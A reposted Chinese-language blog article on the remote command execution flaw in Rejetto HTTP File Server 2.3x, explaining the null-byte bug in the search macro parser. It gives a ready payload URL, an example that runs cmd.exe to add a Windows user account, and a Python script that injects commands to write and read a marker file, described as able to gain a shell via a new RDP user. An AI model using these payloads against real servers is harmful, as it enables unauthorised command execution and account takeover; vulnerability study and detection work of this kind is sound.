HFS的遠程命令執行漏洞（RCE）

本文轉載自查看原文 2018-03-20 01:33 3453 Web安全與Web滲透

一、HFS漏洞

1、影響版本 : 2.3c以前的2.3x版本

2、HFS：

HFS是HTTP File Server，國外的一款HTTP 文件服務器軟件，簡單易上手。

3、漏洞描述：

HTTP File Server是一款專為個人用戶所設計的HTTP文件服務器，它提供虛擬檔案系統，支持新增、移除虛擬檔案資料夾等。

Rejetto HTTP File Server 2.3c及之前版本中的parserLib.pas文件中的‘findMacroMarker’函數中存在安全漏洞，該漏洞源於parserLib.pas文件沒有正確處理空字節。遠程攻擊者可借助搜索操作中的‘%00’序列利用該漏洞執行任意程序。

4、攻擊payload及過程：

4.1 Payload：http://127.0.0.1:8080/?search==%00{.exec|cmd.exe /c [Command-String].}

4.2攻擊過程實例：

http://127.0.0.1:8080/?search==%00{.exec|cmd.exe /c net user test1234 1234 /add.}

說明這個OK的前提是HFS以管理員權限運行：

5、payload：

 1 #-*- coding:utf-8 -*-
 2 
 3 """
 4 這個腳本是檢測是否有HFS漏洞的
 5 當HFS版本處於2.3c機器之前的HFS2.3x版本均可以
 6 當HFS以管理員身份運行時候可以get-shell
 7 原理是創建一個新用戶，設置密碼和權限，然后你就可以RDP了
 8 """
 9 
10 #引入依賴的包、庫文件
11 import time
12 import uuid
13 import requests
14 from optparse import OptionParser
15 
16 
17 #定義掃描類
18 class HFSScanner:
19     """
20         HFS掃描類，原理是：
21             （1）生成隨機字符串，利用命令執行寫入遠端服務器的HFS.exe目錄下的一個文件。
22             （2）然后再次利用這里漏洞將文件內容讀取出來放在響應報文的頭部字段set-cookie中。
23             （3）通過判斷響應報文該字段是否包含隨機字符串來確定是否存在漏洞
24 
25     """
26     def __init__(self,target,port):
27         """創建掃描類實例對象"""
28         self.__randomflag = uuid.uuid1() #攻擊驗證隨機標志字符串
29         self.__attack_url = r"http://%s:%s/"%(str(target),str(port))+"?search==%00"+r"{.exec|cmd.exe /c del result}"+r"{"+".exec|cmd.exe /c echo>result "+str(self.__randomflag)+"."+"}"
30         self.__verify_url = r"http://%s:%s/"%(str(target),str(port))+"?search==%00"+"{.cookie|out|value={.load|result.}.}"
31 
32 
33     def __attack(self):
34         """發送攻擊報文，響應200后反回True"""
35         try:
36             response = requests.get(self.__attack_url,timeout=120)
37         except Exception,reason:
38             return False
39         if response.status_code != 200:
40             return False
41         return True
42 
43     def __verify(self):
44         """發送驗證報文，判斷set-cookie字段是否為隨機標志字符串"""
45         try:
46             response = requests.get(self.__verify_url,timeout=120)
47         except Exception,reason:
48             return False
49         if response.headers.get("set-cookie").find(str(self.__randomflag)) >= 0:
50             return True
51         else:
52             return False
53 
54     def scan(self):
55         """掃描函數"""
56         print "[+] 開始測試..."
57         if self.__attack():
58             time.sleep(5)
59             if self.__verify():
60                 return True
61         return False
62 
63 if __name__ == "__main__":
64     parser = OptionParser("")
65     parser.add_option("-t", dest="target",help="target to scan")
66     parser.add_option("-p", dest="port",help="port to scan")
67     (options, args) = parser.parse_args()
68     if options.target in ["",None]:
69         print "[-] 請輸入正確的參數!"
70         print """
71             正確的使用方法：
72             #python hfs_vuln_scan.py -t 127.0.0.1 [-p 8080]
73         """
74         exit(0)
75     if options.port in ["",None] or int(options.port) <= 0 and int(options.port) > 65535:
76         options.port = "80"
77     scanner = HFSScanner(options.target,options.port)
78     if scanner.scan():
79         print "[*] 目標主機存在漏洞"
80     else:
81         print "[+] 目標主機不存在漏洞"

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 初見RCE（遠程命令/代碼執行漏洞） Pikachu-RCE（遠程命令和遠程代碼-執行漏洞） pikachu靶場-RCE（遠程代碼、命令執行漏洞） pikachu學習——RCE（遠程命令代碼執行漏洞）漏洞復現-2.x rce-Thinkphp遠程命令執行 HFS遠程命令執行漏洞入侵抓雞黑闊服務器 RCE（遠程命令/代碼執行漏洞）原理及復現 pikachu-遠程代碼、命令執行漏洞（RCE） RCE——遠程命令/代碼執行 RCE 命令執行+代碼執行漏洞